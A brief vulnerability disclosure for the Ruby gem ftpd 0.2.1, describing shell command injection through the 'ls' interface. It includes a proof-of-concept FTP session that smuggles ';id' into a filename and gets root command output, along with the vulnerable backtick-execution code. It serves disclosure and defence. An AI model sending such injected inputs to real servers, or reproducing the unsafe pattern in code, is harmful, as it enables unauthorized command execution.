Title:Remote command execution for Ruby Gem ftpd-0.2.1The ls interface can have commands injected into it if option or filename contain the shell character ; The example.rb server listens to localhost only which I used to test the ftp library. But if this gem is used normally it could be configured to listen on 0.0.0.0. PoC: for this to work the file must exist in the CWD. ftp> root@ubuntu:/tmp# sh /tmp/connect-to-example-ftp-server.sh Connected to localhost. 220 ftpd Name (localhost:root): 331 Password required Password: 230 Logged in Remote system type is UNIX. Using binary mode to transfer files. * I created the filename adfasdf ftp> ls adfasdf;id 200 PORT command successful 150 Opening ASCII mode data connection -rw-r--r-- 1 root root 0 Mar 2 05:52 adfasdf uid=0(root) gid=0(root) groups=0(root) 226 Transfer complete ftp>./ftpd-0.2.1/lib/ftpd/disk_file_system.rb The problem code is below 204 Ls interface used by List and NameList 205 206 module Ls 207 208 def ls(ftp_path, option) 209 path = expand_ftp_path(ftp_path) 210 dirname = File.dirname(path) 211 filename = File.basename(path) 212 command = [ 213 'ls', 214 option, 215 filename, <-- ;cmd inject 216 '2>&1', 217 ].compact.join(' ') 218 if File.exists?(dirname) <- file has to exist to exec ls command 219 list = Dir.chdir(dirname) do 220 `{command}` <-- exec